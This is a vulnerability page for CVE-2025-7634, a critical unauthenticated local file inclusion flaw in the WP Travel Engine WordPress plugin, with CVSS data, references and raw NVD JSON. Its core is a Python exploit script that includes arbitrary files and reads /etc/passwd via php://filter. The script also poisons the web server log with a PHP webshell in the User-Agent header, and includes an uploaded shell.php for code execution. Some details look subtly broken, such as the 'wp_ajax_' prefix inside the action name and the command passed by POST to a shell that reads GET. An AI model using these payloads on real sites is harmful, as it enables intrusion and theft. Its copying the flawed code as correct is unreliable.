CVE-2025-7634

Description

The WP Travel Engine – Tour Booking Plugin – Tour Operator Software plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6.6.7 via the mode parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP Travel Engine <= 6.6.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-7634 - WP Travel Engine Local File Inclusion PoC
# Vulnerability: Unauthenticated LFI via 'mode' parameter in Ajax controllers
# Affected: WP Travel Engine <= 6.6.7

import requests

TARGET_URL = "http://target-wordpress-site.com"
# The vulnerable endpoint is an admin-ajax.php action
AJAX_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php"

def exploit_lfi(target_file):
    """
    Exploit the LFI vulnerability by including arbitrary PHP files
    via the 'mode' parameter in WP Travel Engine's Ajax controllers.
    """
    # Action 'wp_ajax_wpte_filter_trips' or related action triggers the vulnerable code path
    payload = {
        "action": "wp_ajax_wpte_filter_trips",
        "mode": target_file  # Inject arbitrary file path here
    }

    response = requests.post(AJAX_ENDPOINT, data=payload)
    return response.text

def exploit_rce_via_log_poisoning():
    """
    Achieve RCE through log poisoning combined with LFI.
    Step 1: Inject PHP code into access log via User-Agent header
    Step 2: Include the access log via the LFI vulnerability
    """
    # Step 1: Poison the access log with PHP code
    log_poison_url = f"{TARGET_URL}/index.php"
    headers = {
        "User-Agent": "<?php system($_GET['cmd']); ?>"
    }
    requests.get(log_poison_url, headers=headers)

    # Step 2: Include the poisoned log file via LFI
    log_path = "/var/log/apache2/access.log"  # Adjust path based on server
    # Use PHP wrappers to execute commands
    rce_payload = {
        "action": "wp_ajax_wpte_filter_trips",
        "mode": log_path,
        "cmd": "id"  # Command to execute
    }
    response = requests.post(AJAX_ENDPOINT, data=rce_payload)
    return response.text

def exploit_rce_via_file_upload():
    """
    If the site allows PHP file uploads (e.g., via a separate vulnerability),
    upload a malicious PHP file and include it via LFI.
    """
    # Assume a webshell was uploaded to /wp-content/uploads/shell.php
    shell_path = "/wp-content/uploads/shell.php"
    payload = {
        "action": "wp_ajax_wpte_filter_trips",
        "mode": shell_path
    }
    response = requests.post(AJAX_ENDPOINT, data=payload)
    return response.text

# Example usage:
if __name__ == "__main__":
    # Basic LFI to read /etc/passwd (after wrapping with PHP filter)
    print("[*] Attempting LFI exploitation...")
    # Use php://filter to read file contents as base64
    result = exploit_lfi("php://filter/convert.base64-encode/resource=/etc/passwd")
    print(f"Result: {result}")

    # Or achieve RCE via log poisoning
    # print("[*] Attempting RCE via log poisoning...")
    # result = exploit_rce_via_log_poisoning()
    # print(f"Result: {result}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-7634
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-7634
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-7634/
[4] VulDB https://vuldb.com/cve/CVE-2025-7634
[5] https://plugins.trac.wordpress.org/browser/wp-travel-engine/tags/6.6.0/includes/classes/Core/Controllers/Ajax/FilterTripsHtml.php#L72
[6] https://plugins.trac.wordpress.org/browser/wp-travel-engine/tags/6.6.0/includes/classes/Core/Controllers/Ajax/LoadTripsHtml.php#L27
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/ce119965-01a0-4cff-a0b2-e99bceb1406c?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-7634", "sourceIdentifier": "[email protected]", "published": "2025-10-09T06:15:36.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Travel Engine – Tour Booking Plugin – Tour Operator Software plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6.6.7 via the mode parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-travel-engine/tags/6.6.0/includes/classes/Core/Controllers/Ajax/FilterTripsHtml.php#L72", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-travel-engine/tags/6.6.0/includes/classes/Core/Controllers/Ajax/LoadTripsHtml.php#L27", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ce119965-01a0-4cff-a0b2-e99bceb1406c?source=cve", "source": "[email protected]"}]}}